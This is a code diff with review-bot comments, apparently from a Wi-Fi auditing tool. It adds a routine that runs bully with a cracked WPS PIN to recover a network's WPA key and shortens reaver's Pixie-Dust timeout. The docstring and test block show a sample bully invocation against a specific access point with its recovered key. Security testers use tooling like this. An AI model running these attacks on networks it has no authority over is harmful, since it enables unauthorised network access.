Fetch PSK when reaver fails to find it using Bully
Also changed reaver --timeout from 10 seconds (default) to 4 seconds. Resolves #76
@@ -2,12 +2,12 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
from ..model.attack import Attack
|
||||
from ..model.wps_result import CrackResultWPS
|
||||
from ..tools.airodump import Airodump
|
||||
from ..util.color import Color
|
||||
from ..util.timer import Timer
|
||||
from ..util.process import Process
|
||||
from ..config import Configuration
|
||||
from ..model.wps_result import CrackResultWPS
|
||||
|
||||
import os, time, re
|
||||
from threading import Thread
|
||||
@@ -214,7 +214,48 @@ class Bully(Attack):
|
||||
def __del__(self):
|
||||
self.stop()
|
||||
|
||||
@staticmethod
|
||||
def get_psk_from_pin(target, pin):
|
||||
'''
|
||||
bully --channel 1 --bssid 34:21:09:01:92:7C --pin 01030365 --bruteforce wlan0mon
|
||||
PIN : '01030365'
|
||||
KEY : 'password'
|
||||
BSSID : '34:21:09:01:92:7c'
|
||||
ESSID : 'AirLink89300'
|
||||
'''
|
||||
Color.pl('\n{+} found PIN: {G}%s{W}' % pin)
|
||||
Color.p('{+} fetching {C}PSK{W} using {C}bully{W}... ')
|
||||
cmd = [
|
||||
'bully',
|
||||
'--channel', target.channel,
|
||||
'--bssid', target.bssid,
|
||||
'--pin', pin,
|
||||
'--bruteforce',
|
||||
Configuration.interface
|
||||
]
|
||||
|
||||
bully_proc = Process(cmd)
|
||||
|
||||
for line in bully_proc.stderr().split('\n'):
|
||||
key_re = re.search(r"^\s*KEY\s*:\s*'(.*)'\s*$", line)
|
||||
if key_re is not None:
|
||||
psk = key_re.group(1)
|
||||
Color.pl('{W}found PSK: {G}%s{W}' % psk)
|
||||
return psk
|
||||
|
||||
Color.pl('{R}failed{W}')
|
||||
return None
|
||||
|
||||
if __name__ == '__main__':
|
||||
Configuration.initialize()
|
||||
Configuration.interface = 'wlan0mon'
|
||||
from ..model.target import Target
|
||||
fields = '34:21:09:01:92:7C,2015-05-27 19:28:44,2015-05-27 19:28:46,1,54,WPA2,CCMP TKIP,PSK,-58,2,0,0.0.0.0,9,AirLink89300,'.split(',')
|
||||
target = Target(fields)
|
||||
psk = Bully.get_psk_from_pin(target, '01030365')
|
||||
print "psk", psk
|
||||
|
||||
'''
|
||||
stdout = " [*] Pin is '11867722', key is '9a6f7997'"
|
||||
Configuration.initialize(False)
|
||||
from ..model.target import Target
|
||||
@@ -222,3 +263,4 @@ if __name__ == '__main__':
|
||||
target = Target(fields)
|
||||
b = Bully(target)
|
||||
b.parse_line(stdout)
|
||||
'''
|
||||
|
||||
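Review bot: `get_psk_from_pin` documents only a sample invocation and its output; the contract should be stated above that example, e.g. `Run bully with an already-cracked PIN to recover the PSK. Returns the PSK string when a KEY line is found, otherwise prints 'failed' and returns None. Blocks until bully exits.` Only `bully_proc.stderr()` is scanned, so if bully reports the KEY line on stdout the lookup will always fall through to the failure branch; this should be confirmed against the Process helper and bully's actual output stream. No timeout is visible on the `Process(cmd)` call, so an unresponsive AP can stall the caller indefinitely unless Process enforces one. The trailing `'''` block in the `__main__` section keeps the previous smoke test alive as a dead string literal; deleting it is cleaner than commenting it out this way.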
@@ -6,6 +6,7 @@ from ..config import Configuration
|
||||
from ..util.color import Color
|
||||
from ..util.process import Process
|
||||
from ..tools.airodump import Airodump
|
||||
from ..tools.bully import Bully # for PSK retrieval
|
||||
from ..model.wps_result import CrackResultWPS
|
||||
|
||||
import os, time, re
|
||||
@@ -33,6 +34,7 @@ class Reaver(Attack):
|
||||
'--bssid', self.target.bssid,
|
||||
'--channel', self.target.channel,
|
||||
'--pixie-dust', '1', # pixie-dust attack
|
||||
'--timeout', '4', # Stop waiting after 4 seconds
|
||||
#'--delay', '0',
|
||||
#'--no-nacks',
|
||||
'--session', '/dev/null', # Don't restart session
|
||||
@@ -80,9 +82,17 @@ class Reaver(Attack):
|
||||
# Check if we cracked it.
|
||||
if pin is not None:
|
||||
# We cracked it.
|
||||
|
||||
if psk is None:
|
||||
# Try to derive PSK from PIN using Bully
|
||||
psk = Bully.get_psk_from_pin(self.target, pin)
|
||||
|
||||
bssid = self.target.bssid
|
||||
Color.clear_entire_line()
|
||||
Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}")
|
||||
if psk is None:
|
||||
Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN{W} (but not PSK)")
|
||||
else:
|
||||
Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}")
|
||||
Color.pl("")
|
||||
self.crack_result = CrackResultWPS(bssid, ssid, pin, psk)
|
||||
self.crack_result.dump()
|
||||
|
||||
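Review bot: The new `Bully.get_psk_from_pin` call under `if psk is None:` runs before `self.crack_result` is assigned, so if it raises (for example when the bully binary is not installed and Process fails to spawn it) the already-cracked PIN is lost together with the PSK. Guarding the call, e.g. `try: psk = Bully.get_psk_from_pin(self.target, pin)` / `except OSError: psk = None`, keeps the PIN-only result path reachable; which exception Process raises on a missing binary is not visible here and should be checked. The enclosing method starts before this hunk.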